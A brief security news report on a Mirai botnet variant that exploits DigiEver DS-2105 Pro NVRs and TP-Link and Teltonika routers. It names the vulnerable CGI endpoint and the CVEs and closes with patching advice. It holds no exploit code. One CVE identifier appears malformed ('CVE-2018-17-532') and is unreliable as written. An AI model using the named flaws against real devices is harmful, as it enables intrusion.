The new Mirai botnet is actively exploiting vulnerabilities in DigiEver DS-2105 Pro IP video recorders (NVRs) and legacy TP-Link routers.
Akamai researchers report that the botnet has been operating since at least September and targets devices with unpatched firmware.
The DigiEver vulnerability allows remote attackers to execute commands through incorrect input validation in the URI /cgi-bin/cgi_main.cgi. Hackers use this flaw to inject malicious commands and download malware from external servers. The botnet also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17-532 in Teltonika RUT9XX routers.
Compromised devices are used for DDoS attacks or further propagation of the worm. The botnet is distinguished by its use of XOR and ChaCha20 encryption, as well as compatibility with various architectures, including x86, ARM, and MIPS.
Users are advised to update firmware and monitor unusual device activity to mitigate risks.